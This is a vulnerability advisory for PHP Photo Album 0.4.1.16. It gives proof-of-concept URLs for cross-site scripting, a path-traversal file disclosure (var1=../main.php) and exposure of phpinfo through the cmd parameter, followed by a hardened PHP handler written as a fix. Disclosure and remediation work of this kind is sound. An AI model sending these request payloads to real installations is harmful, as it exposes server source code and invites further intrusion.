Title: PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities
Program name: [PHP Photo Album]
Author: BHG Security Center www.2cto.com black-hg.org
Software address: [http://www.phpalbum.net/dw]
Version: [0.4.1.16]
Level: High Risk
Test Platform: [linux + apache]
Overview: The vulnerabilities allow files on the server to be read, limited to what the web server process has permission to access.
+----------------------+
| Cross Site Scripting |
+----------------------+
The vulnerable code is located in /www/main.php?cmd=imageview&var1=[XSS]
Proof:
-----------------
~ PoC: http://www.bkjia.com/phpAlbum/main.php?cmd=imageview&var1=[XSS]
~ PoC 2: http://www.bkjia.com/phpAlbum/main.php?cmd=albumnew&keyword=[XSS]
+----------------------+
| Download/Source Code |
+----------------------+
The vulnerable code is located in /www/main.php
Proof:
-----------------
~ PoC: http://www.bkjia.com/phpAlbum/main.php?cmd=image&var1=[LFD]
~ PoC: http://www.bkjia.com/phpAlbum/main.php?cmd=image&var1=../main.php
~ PoC 2: http://www.bkjia.com/main.php?cmd=themeimage&var1=[LFD]
# Important Notes:
The PHP file's source code is returned in the response; use View Page Source in your browser to read it.
+--------------------+
| PHP Code Injection |
+--------------------+
The vulnerable code is located in /www/main.php
124: Array
125: (
126:     [0] => cmd=phpinfo
127: )
Proof of Concept:
-----------------
~ PoC: http://www.bkjia.com/phpAlbum/main.php?cmd=phpinfo
~ PoC: http://www.bkjia.com/demo3/main.php?keyword=hack&cmd=phpinfo
~ PoC 2: http://www.bkjia.com/main.php?cmd=setquality&var1=[PHP Code Injection]
Solution: strengthen security awareness.
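As an added illustration of what a concrete fix for the three findings above looks like, the following hardened request handler was written for this advisory. It is not phpAlbum's code; the directory IMAGE_ROOT, the command allowlist and the handler function names are assumptions. It addresses each finding in turn: cmd is dispatched only through a fixed allowlist (so an unexpected cmd value is rejected rather than interpreted), var1 is confined to the image directory with realpath() and a prefix check (so ../main.php cannot be served), and every reflected parameter is HTML-encoded before output (so var1 and keyword cannot carry markup).

```php
<?php
// Added example for this advisory, not phpAlbum's code. IMAGE_ROOT, COMMANDS
// and the handler names are hypothetical; the three controls are the point.
declare(strict_types=1);

const IMAGE_ROOT = '/var/www/phpAlbum/photos'; // assumed image directory

// 1. Only commands in this allowlist are dispatched. Anything else, such as
//    cmd=phpinfo, gets a 400 instead of being executed.
const COMMANDS = [
    'image'     => 'handleImage',
    'imageview' => 'handleImageView',
    'albumnew'  => 'handleAlbumNew',
];

// 2. Confine a user-supplied file name to IMAGE_ROOT. realpath() resolves "..",
//    symlinks and encoded separators; the prefix check rejects any result that
//    escapes the directory, so var1=../main.php resolves to null, not to a file.
function resolveImagePath(string $name): ?string
{
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $root = realpath(IMAGE_ROOT);
    if ($root === false) {
        return null;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        return null;
    }
    if (strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    // Serve image types only; never fall back to reading arbitrary files.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    return $candidate;
}

// 3. Encode every reflected value before it reaches HTML so that a var1 or
//    keyword containing markup is displayed as text, not parsed by the browser.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function handleImage(array $q): void
{
    $path = resolveImagePath((string)($q['var1'] ?? ''));
    if ($path === null) {
        http_response_code(404);
        exit('not found');
    }
    header('Content-Type: ' . mime_content_type($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

function handleImageView(array $q): void
{
    echo '<h1>Image ' . h((string)($q['var1'] ?? '')) . '</h1>';
}

function handleAlbumNew(array $q): void
{
    echo '<p>Search: ' . h((string)($q['keyword'] ?? '')) . '</p>';
}

$cmd = (string)($_GET['cmd'] ?? 'imageview');
if (!isset(COMMANDS[$cmd])) {
    http_response_code(400);
    exit('unknown command');
}
$handler = COMMANDS[$cmd];
$handler($_GET);
```

The allowlist is the control that matters most here: as long as cmd is looked up in a fixed map rather than passed to eval(), call_user_func() or a dynamic include, no value of cmd can reach phpinfo() or other code. The realpath() prefix check must compare against the resolved root (not the literal constant), otherwise a symlinked image directory makes every request fail closed.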
============================== [End] ==============================